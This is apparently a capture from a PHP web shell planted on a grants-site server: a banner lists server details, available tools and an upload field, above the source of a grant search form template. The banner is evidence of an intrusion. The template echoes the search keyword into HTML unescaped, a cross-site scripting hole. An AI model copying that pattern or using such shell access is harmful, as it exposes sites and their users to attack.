| Server IP : 10.200.247.200 / Your IP : 216.73.217.19 Web Server : Apache System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64 User : jeremy ( 1001) PHP Version : 8.4.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/usa_sites/governmentgrants.us/vx/usa/search_old/ |
Upload File : |
<form onsubmit="
$('#showOverlayMessage').show();
$('#overlayMessageTitle').text('Searching');
$('#overlayMessageSubtitle').text('Please Wait...');
"
id="searchForm" action="/vx/usa/search/" method="post" enctype="multipart/form-data">
<div class="relative iblock left">
<?
if($onSearch)
{
/*?>
<div class="aib white-bg dropshadow-light tutorial left layer-top pointer" ng-show="!phone && !searchExamples"
style="width:32px; height:32px; margin-right:30px; border-radius:16px; top:24px; left:-40px;"
ng-click="searchExamples = !searchExamples">
<div class="rib" style="top:-2px; left:-4px;">
<span class="glyphicons glyphicons-question-sign f24 bblue"></span>
</div>
</div>
<?*/
}
?>
<label class="pt20">
<div class="rib">
<input id="searchKeyword" type="text" name="keyword" class="searchKeyword fleft" placeholder="Search Term"
value="<?=stripslashes($ogKeyword)?>" style="border-color:rgba(0,0,0,0.2);" />
<button type="submit" class="fleft white-bg bborder tborder rborder searchButton"
style="margin:0px; margin-left:-1px;">
<i class="glyphicons glyphicons-search f18"></i>
</button>
<?
$selectedSubCategories = (!empty($_POST['postSubCategories'])) ? $_POST['postSubCategories'] : array();
foreach($selectedSubCategories as $key => $value)
{
if(($value * 1) > 0)
{
?>
<input type="hidden" value="<?=$value?>"
name="postSubCategories[<?=$key?>]"
id="subCategoryFilter<?=$value?>"
class="subcategories" />
<?
}
}
?>
</div>
</label>
</div>
<?
if(!$keywordHelp && $onSearch)
{
?>
<div id="keywordHelp" class="aib white-bg p10 dropshadow-light tutorial left layer-top"
style="width:200px; height:auto; margin-left:30px; border-radius:5px;">
<div class="arrow-left-bg" style="left:-22px; top:28px;"></div>
<div class="arrow-left" style="left:-20px; top:30px;"></div>
<div class="rb">
Enter a keyword or term and click the magnifying glass button to start a grant search.
</div>
<div class="rb cc p4 rou bold bblue f11" ng-click="stopKeywordHelp()">
Hide This Hint
</div>
</div>
<?
}
?>
</form>